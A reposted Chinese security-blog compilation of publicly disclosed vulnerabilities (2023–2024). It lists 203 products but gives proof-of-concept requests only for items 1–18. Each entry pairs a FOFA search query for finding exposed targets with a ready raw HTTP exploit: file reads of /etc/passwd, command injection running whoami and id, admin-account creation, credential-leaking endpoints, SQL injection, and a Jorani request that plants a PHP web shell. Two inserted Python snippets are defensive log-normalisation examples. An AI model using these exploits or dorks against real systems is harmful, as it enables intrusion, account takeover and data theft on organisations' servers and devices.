Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全, 2024-06-05 07:41, Beijing
The following article is reproduced from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. This compilation is meant to help defenders; defensive teams can use it to check their own exposure.

Sources: the article covers 203 proof-of-concepts for high-impact vulnerabilities disclosed publicly, in China and abroad, between September 2023 and May 2024. All of them were taken from other public accounts or websites and were collected and published by the 网络安全新视界 team.

Patches: every entry is a publicly disclosed vulnerability; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long are replaced by the placeholder PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's back end and the content will be removed.

Statement

To keep things simple for readers, there is no "reply to see the full list": this article is the complete list. When using it, search the page for the keyword you need (F12 in the browser).

Bookmark this article if you find it useful, or follow the public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC smart IoT integrated management platform arbitrary file read
21. Dahua ICC smart IoT integrated management platform random remote code execution
22. Dahua ICC smart IoT integrated management platform log4j remote code execution
23. Dahua ICC smart IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi-Anxin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi-Anxin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings interface cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 back end sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass via template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) full-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 of the password you want to set.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin back end with the default admin account first, then send the request below. The stok in the path and the sysauth cookie come from that login; the %s values are placeholders as given in the source.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained at login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload after keyword=1 is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
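The following is an added example, not part of the original compilation or of the CMS's code. It reproduces the double encoding of the statement above from the request on the page and shows why it matters for detection: a filter that percent-decodes the query string once still sees only "%27%20%61..." and matches nothing, while the application decodes a second time before building the query. The normaliser decodes until the value stops changing; the SQL pattern it applies is illustrative.

```python
"""Double URL-encoding of the DocCMS keyword payload (added example)."""
import re
from urllib.parse import unquote

# Decoded statement, as given on the page.
STATEMENT = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"

# The keyword value from the request on the page: a literal "1" followed by
# the double-encoded statement (split here only for readability).
KEYWORD_FROM_PAGE = (
    "1"
    "%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30"
    "%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31"
    "%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35"
    "%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66"
    "%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30"
    "%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33"
    "%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30"
    "%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39"
    "%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35"
    "%25%32%39%25%32%39%25%32%39%25%32%33"
)


def percent_encode_all(text: str) -> str:
    """Percent-encode every byte, lowercase hex, as in the request on the page."""
    return "".join(f"%{b:02x}" for b in text.encode("utf-8"))


def double_encode(text: str) -> str:
    """Encode twice: the second pass turns every '%' into '%25' and every hex digit into '%3x'."""
    return percent_encode_all(percent_encode_all(text))


def normalise(value: str, max_rounds: int = 5) -> str:
    """Decode repeatedly until the value stops changing; the bound stops decode loops."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


# Illustrative rule for MySQL error-based extraction primitives (hypothetical).
SQLI_RE = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.IGNORECASE)


def flagged_after(value: str, decode_rounds: int) -> bool:
    """Apply the rule after a fixed number of decode passes, to show the effect of each."""
    for _ in range(decode_rounds):
        value = unquote(value)
    return SQLI_RE.search(value) is not None


def flagged(value: str) -> bool:
    """Apply the rule to the fully normalised value."""
    return SQLI_RE.search(normalise(value)) is not None


if __name__ == "__main__":
    print(double_encode(STATEMENT) == KEYWORD_FROM_PAGE[1:])   # the page's blob, reproduced
    print(normalise(KEYWORD_FROM_PAGE))                        # 1' and (extractvalue(...))#
    print(flagged_after(KEYWORD_FROM_PAGE, 1), flagged(KEYWORD_FROM_PAGE))  # False True
```

The point to take from `flagged_after`: one decode pass is not enough, and a fixed two passes is only enough until someone encodes three times. Decode to a fixed point (with a bound) before matching, and compare what the filter sees with what the application decodes.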

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST to the login endpoint. The language parameter traverses to application/logs, so the PHP in the login field is written into that day's log file; the resulting web shell runs whatever the K1SYJPMHLU4Z request header carries, base64-decoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command, which decodes to echo ---------;id 2>&1;echo ---------;
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

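The following is an added example, not part of the original compilation or of jshERP's code. It serves two passages: the note at the top that defenders can use this list to check their exposure, and items 14 and 15 just above. Those two items reach the same controller through two different raw request targets, "/user/getAllList;.ico" and "/user/a.ico/../getAllList". Any access-control rule that pattern-matches the raw string (the hypothetical rule below treats a request as a public static file whenever a static extension is followed by a delimiter) lets both through, while the servlet container resolves matrix parameters and ".." before routing and lands on the protected endpoint. A log review needs the same canonicalisation: match the resolved path, not the raw one, against the endpoints in this list. The indicator table is a hand-picked subset of the POC list, and the log lines are constructed for the example.

```python
"""Canonicalising request targets before matching them (added example)."""
import re
from urllib.parse import unquote, urlsplit

# Request paths taken from the POC list above, with the item each belongs to.
INDICATORS = {
    "/mem_tracker": "item 1, StarRocks unauthenticated access",
    "/api/v1/userlist": "item 3, EasyCVR user list disclosure",
    "/__debugging_center_utils___.php": "item 5, NUUO NVR command execution",
    "/svpn_html/loadfile.php": "item 6, Sangfor NGAF file read",
    "/jshERP-boot/user/getAllList": "items 14/15, jshERP user list disclosure",
    "/evo-apigw/evo-cirs/file/readPic": "item 20, Dahua ICC file read",
    "/portal/registerServlet": "item 25, Yonyou NC JNDI injection",
}


def resolve_target(raw: str):
    """Return (canonical_path, saw_dotdot) for a raw request target.

    Mirrors what a servlet container does before routing: bounded repeated
    percent-decoding, matrix parameters (";.ico") dropped per segment, and
    "." / ".." resolved without climbing above "/".
    """
    path = urlsplit(raw).path
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments, saw_dotdot = [], False
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            saw_dotdot = True
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments), saw_dotdot


def canonical_path(raw: str) -> str:
    return resolve_target(raw)[0]


# The kind of rule that gets bypassed (hypothetical): a static-file extension
# followed by a delimiter or the end of the path makes the request "public".
STATIC_EXT_RE = re.compile(r"\.(ico|css|js|png|jpg)(?=[;/?]|$)")


def naive_is_static(raw: str) -> bool:
    return STATIC_EXT_RE.search(raw) is not None


# Common Log Format, enough fields for this purpose.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (client ip, canonical path, description) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, saw_dotdot = resolve_target(m["target"])
        if path in INDICATORS:
            hits.append((m["ip"], path, INDICATORS[path]))
        elif saw_dotdot:
            hits.append((m["ip"], path, "directory traversal in request target"))
    return hits


# Constructed sample lines, not real traffic. Addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2024:14:31:29 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Jun/2024:14:31:30 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 5120',
    '198.51.100.3 - - [05/Jun/2024:14:32:01 +0800] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 1930',
    '198.51.100.3 - - [05/Jun/2024:14:32:05 +0800] "GET /static/..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1930',
    '192.0.2.10 - - [05/Jun/2024:14:33:00 +0800] "GET /favicon.ico HTTP/1.1" 200 1406',
    '192.0.2.10 - - [05/Jun/2024:14:33:02 +0800] "POST /portal/registerServlet HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for raw in ("/jshERP-boot/user/getAllList;.ico", "/jshERP-boot/user/a.ico/../getAllList"):
        print(raw, "->", canonical_path(raw), "| naive rule says static:", naive_is_static(raw))
    for hit in scan_access_log(SAMPLE_LOG):
        print(*hit)
```

Both bypass forms are reported as static by the naive rule and both resolve to `/jshERP-boot/user/getAllList`, which the naive rule would not call static. The fix on the application side is the same as on the review side: make authorization decisions on the canonical path the framework will actually dispatch, or reject targets containing `;` or `..` segments outright.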

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234; the expression 1-CONVERT(VARCHAR(32), HASHBYTES('MD5','1234'), 2) makes SQL Server return that hash in a type-conversion error, which confirms the injection.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
